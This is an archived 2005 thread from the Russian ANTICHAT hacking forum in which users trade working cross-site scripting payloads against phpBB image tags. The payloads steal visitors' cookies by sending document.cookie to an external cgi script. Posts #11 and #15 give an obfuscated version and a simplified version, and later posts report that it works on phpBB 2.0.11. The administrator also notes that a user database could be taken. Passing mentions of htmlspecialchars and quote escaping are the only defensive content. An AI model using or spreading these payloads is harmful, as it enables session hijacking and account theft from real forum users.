ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.01.2005, 23:42
zFlex
Новичок
Регистрация: 26.12.2004
Сообщений: 5
Провел на форуме:
0

Репутация: 0
Отправить сообщение для zFlex с помощью ICQ
По умолчанию

Вот пример:
Код:
http://www.smailiki.nm.ru/lam/lam4.gif" style="background:url(javascript:document.images[0].src=/http:xxantichat.ruxcgi-binxs.jpg?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
Кто будет писать видео, просьба написать, что уязвимость нашел Mr. Iron (icq # 9170797)
Самое простое решение против этого XSS - это htmlspecialchars()

Последний раз редактировалось Егорыч+++; 14.01.2005 в 00:11..
 
Ответить с цитированием

  #12  
Старый 13.01.2005, 23:53
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

да прикольно..
 
Ответить с цитированием

  #13  
Старый 13.01.2005, 23:55
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Плохо что максимум что можно с этого взять это базу пользователей
 
Ответить с цитированием

  #14  
Старый 14.01.2005, 00:44
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
Провел на форуме:
36241

Репутация: 1
Отправить сообщение для >>ElvI$<< с помощью ICQ
По умолчанию

Кстате,под эту уязвимость не попадает Phpbb 2.0.11 ....
если я не прав... заделитесь ссылочкой Icq:937843
 
Ответить с цитированием

  #15  
Старый 14.01.2005, 13:00
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:
Код:
http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
 
Ответить с цитированием

  #16  
Старый 14.01.2005, 13:33
TORn@Do
Banned
Регистрация: 14.01.2005
Сообщений: 9
Провел на форуме:
12

Репутация: 0
По умолчанию

Цитата:
Сообщение от Algol  
Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:
Код:
http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
урааааааааа Работает даже на версси PHPBB 2.0.11
 
Ответить с цитированием

  #17  
Старый 14.01.2005, 13:37
TORn@Do
Banned
Регистрация: 14.01.2005
Сообщений: 9
Провел на форуме:
12

Репутация: 0
По умолчанию

plunul eto:
document.writeln (
"<a target=_blank href='http://ad.strict.tbn.ru/bb.cgi?cmd=go&r=r_ssi" +
"&vbn=353&pac=2836328&pnm=7&bac=69735877&bnm=2&ref =http%3A%2F%2Ftattoo%2Efani%2Eru%2F&loc=&htr=http% 3A%2F%2Ftattoo%2Efani%2Eru%2Fgallery%2F'>" +
"<img src='http://195.161.118.159/69735/69735877_2.gif' border=0 width=468 height=60 alt=\"TBN -- The Banner Network\" title=\"TBN -- The Banner Network\"></a>"
);
 
Ответить с цитированием

  #18  
Старый 15.01.2005, 09:17
A1ien
Новичок
Регистрация: 15.01.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)
И куда сохраняется файл с Хешами ???
 
Ответить с цитированием

  #19  
Старый 15.01.2005, 13:30
alien51
Новичок
Регистрация: 13.01.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

Вот вот где путь то на скрип и какой должен быть скрипт ... ??
 
Ответить с цитированием

  #20  
Старый 15.01.2005, 17:30
b00
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от TORn@Do  
урааааааааа Работает даже на версси PHPBB 2.0.11
Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ